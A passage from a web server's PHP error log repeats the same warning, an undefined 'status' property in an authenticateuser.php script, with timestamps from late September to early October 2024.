stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 12:39:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 12:41:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 13:36:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 22:58:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 23:47:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 00:12:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 00:17:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 00:45:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 00:50:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 01:06:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 01:16:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 01:28:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:01:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:17:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:18:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:21:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:52:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:52:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 02:54:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:08:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:14:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:33:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:39:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 03:39:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 04:20:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 04:29:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 04:30:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 04:46:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 05:07:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 05:10:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 05:37:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 06:19:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 06:27:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 06:33:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 06:57:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 07:00:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 07:33:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 07:59:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 23:01:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 23:25:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Sep-2024 23:30:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 00:01:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 00:59:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 01:01:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 01:03:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 01:59:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 03:08:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 03:50:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 04:14:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 04:25:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 05:04:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 05:06:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 05:09:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 06:19:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 07:43:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 07:48:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 07:55:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Sep-2024 23:49:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 07:25:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 07:28:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 07:38:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 07:42:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 11:51:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:06:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:25:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:26:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:26:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Sep-2024 12:32:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 02:16:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 02:27:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 03:48:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 03:51:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 03:54:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 04:17:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 04:19:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 04:29:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 04:47:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 05:16:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 05:49:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 05:59:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:03:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:06:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:13:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:14:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 06:26:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 22:22:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Sep-2024 23:35:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 00:07:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 00:44:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 00:45:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 00:51:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 01:58:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 01:58:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 03:12:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 03:51:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 04:27:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 04:27:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 05:35:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 05:44:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 07:15:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 08:00:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 11:10:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 11:19:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 12:09:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 22:53:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 23:00:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Sep-2024 23:26:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 00:13:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 00:21:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 00:24:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 00:40:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 01:29:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 01:42:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 02:33:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 02:39:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 02:42:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 03:03:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 03:32:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 03:47:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 03:56:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 04:17:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 04:22:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 04:41:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 05:32:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 06:04:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 06:11:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 06:11:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 07:22:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 08:38:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 09:09:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 11:31:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 12:25:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 12:56:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Oct-2024 23:23:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 00:01:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 00:15:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 01:00:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 01:29:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 01:38:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:07:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:08:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:10:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:13:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:13:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 02:57:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:01:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:02:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:04:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:10:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:49:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 03:59:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:07:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:16:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:27:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:27:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:31:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 04:59:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 05:53:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 06:05:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 06:38:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 08:22:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 08:39:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 08:41:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 22:33:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 23:29:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Oct-2024 23:30:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 00:04:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 00:12:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 00:13:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 00:48:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 01:24:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 01:28:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 01:36:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 01:48:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 02:04:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 02:07:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 02:40:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 03:43:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 03:48:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 04:23:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 04:32:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 04:58:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 05:23:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 05:43:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 06:30:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 06:33:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 06:42:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 06:42:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 08:02:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 09:23:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 10:16:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 11:16:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 11:19:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 12:11:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 22:13:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 22:31:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 23:36:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Oct-2024 23:39:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 01:12:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Oct-2024 01:31:06 UTC] PHP Warning: Undefined 